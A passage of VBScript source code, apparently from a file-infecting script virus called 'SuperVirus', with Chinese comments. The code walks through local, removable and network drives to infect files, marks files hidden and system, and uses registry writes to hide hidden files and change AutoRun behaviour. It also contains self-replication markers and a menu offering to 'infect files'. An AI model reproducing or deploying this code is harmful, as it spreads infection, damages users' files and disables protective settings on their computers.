, True End If End Sub 'AOHGGCXWLVC1_8 'RJQXEIOULXYPL2_10 Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T) On Error Resume Next Dim d , dc Set dc = objfso.Drives For Each d In dc If Cnt >= CntMax Then ' Exit For End If If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then 'If d.DriveType = 1 Then Call SearchFile(objfso, d.Path & "/", VbsCode_WebPage, VbsCode_Victim, T) 'End If End If Next End Sub 'AOHGGCXWLVC2_10 'RJQXEIOULXYPL2_15 Sub SetFileAttr(objfso, pathf) Dim vf Set vf = objfso.GetFile(pathf) vf.Attributes = 6 End Sub 'AOHGGCXWLVC2_15 'RJQXEIOULXYPL1_1 On Error Resume Next Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V Dim ModelHead, ModelTail Cnt = 0 CntMax = 
1000 Version = "4" Name_V1 = GetUserName() & ".vbs" FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向 FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令 FullPath_Config= GetSFolder(1) & GetUserName() & ".ini" Sum_ModelCode = 26 Head_V= GetHeadTail(0) Tail_V= GetHeadTail(1) ModelHead="'RJQXEIOULXYPL" ModelTail="'AOHGGCXWLVC" Call VirusMain() Sub VirusMain() On Error Resume Next Call ExeVbs_Virus() End Sub 'AOHGGCXWLVC1_1 'RJQXEIOULXYPL2_18 Function IsOK(objfso, Now_V, path_f) On Error Resume Next Dim vf, p1, p2, p3 IsOK = False Set vf = objfso.OpenTextFile(path_f, 1) p1 = Trim(vf.ReadLine) p2 = Trim(vf.ReadLine) p3 = Trim(vf.ReadLine) If StrComp(p1, "OK", 1) = 0 And StrComp(p2, Now_V, 1) = 0 Then IsOK = True End If If p3 = "Admin" Then MsgBox "You Are Admin!!! Your Computer Will Not Be Infected!!!" IsOK = True n = InputBox("0:退出; 1:监视系统; 2:传染文件", "SuperVirus脚本测试!") If n = 0 Then Wscript.Quit ElseIf n = 1 Then IsOK = True ElseIf n = 2 Then IsOK = False End If End If End Function 'AOHGGCXWLVC2_18 'RJQXEIOULXYPL2_13 Sub DeSafeSet() Dim HLMShow , HCUAdvanced, HCUExplorer HLMShow = "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" HCUAdvanced = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/ShowSuperHidden" HCUExplorer = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/NoDriveTypeAutoRun" Call WriteReg (HCUExplorer, 129, "REG_DWORD") Call WriteReg (HCUAdvanced, 0, "REG_DWORD") Call WriteReg (HLMShow, 0, "REG_DWORD") End Sub Sub SafeSet() Dim HLMShow , HCUSSHidden, HCUHidden Dim HCUExplorer HLMShow = "HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL/CheckedValue" HCUAdvanced = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/ShowSuperHidden" HCUHidden = "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Hidden" Call WriteReg (HCUHidden, 1, 
"REG_DWORD") Call WriteReg (HCUAdvanced, 1, "REG_DWORD") Call WriteReg (HLMShow, 1, "REG_DWORD") End Sub 'AOHGGCXWLVC2_13 'rotartsinimdA
   
  
